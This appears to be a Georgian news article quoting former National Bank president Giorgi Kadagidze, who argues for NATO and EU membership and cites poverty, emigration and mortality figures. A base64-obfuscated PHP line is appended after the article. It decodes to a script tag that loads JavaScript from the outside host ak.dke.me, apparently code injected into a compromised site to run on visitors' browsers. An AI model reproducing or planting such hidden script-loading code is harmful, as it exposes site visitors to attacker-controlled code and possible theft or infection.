celsiusi
ავერსი შნაიდერი
რადგან საინფორმაციო (ჰიბრიდულ) ომში ყველანი ჩართულები ვართ, დაუღალავად გავიმეოროთ რატომ გვინდა რუსეთისგან ხსნა – წერს სოციალურ ქსელში ეროვნული ბანკის ყოფილი პრეზიდენტი გიორგი ქადაგიძე.
 
ქადაგიძე, იმ კონკრეტულ მიზეზებს ასახელებს, რატომაც მიიჩნევს, რომ ნატოს, ევროპის და დასავლური ცივილიზაციის ნაწილი უნდა გავხდეთ. 
 
მისივე თქმით, ზუსტად იმიტომ გვინდა ვიყოთ ევროპის და ნატო–ს ნაწილი, რომ არ გავნადგურდეთ, როგორც ეს ახლა ხდება და არა პირიქით.
 
"- დღეს საქართველოში 60 ათას ბავშვზე მეტი უკიდურეს სიღარიბეშია, რეალურად შიმშილობს, მათი ფიზიკური და მენტალური განვითარება უდიდეს საფრთხეშია;
- 600 ათას ადამიანზე მეტი სოციალურად დაუცველია, უკიდურეს სოციალურ პირობებშია;
- 300 ათას ადამიანზე მეტი მოვალეთა რეესტრშია;
- სიცოცხლის საშუალო ხანგრძლივობა 15 წლით ნაკლებია ვიდრე დასავლურ ქვეყნებში, 15 წლით ადრე ვკვდებით;
- მილიონზე მეტი ადამიანი ემიგრაციაშია, მოწყვეტილი საკუთარ შვილებს და მშობლებს;
- ქვეყნის 20% ოკუპირებულია;
- 5000 ადამიანით მეტი მხოლოდ კოვიდით მოგვიკვდა, ვიდრე საშუალო ევროპული სიკვდილიანობის მაჩვენებელია;
- ქვეყნის მოსახლეობა ყოველწლიურად მცირდება;
"აბა ომი გინდა? " - არა, ომში უკვე ვართ, ამ ომის დასრულება გვინდა (იხ. ჩამონათვალი)
"100 ბავშვის სიკვდილი ღირს ეფემერულ ნატოს წევრობად, იქნებ ნეიტრალიტეტზე ვიფიქროთ?"- არა, ნატოს, ევროპის და დასავლური ცივილიზაციის ნაწილი ზუსტად იმიტომ გვინდა ვიყოთ, რომ არ გავნადგურდეთ, როგორც ეს ახლა ხდება და არა პირიქით (იხ. ჩამონათვალი) 
Stay strong UKRAINE!
 დიდება უკრაინაში დაღუპულ ჩვენ გმირებს" – წერს ქადაგიძე.
 
 
 
874
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");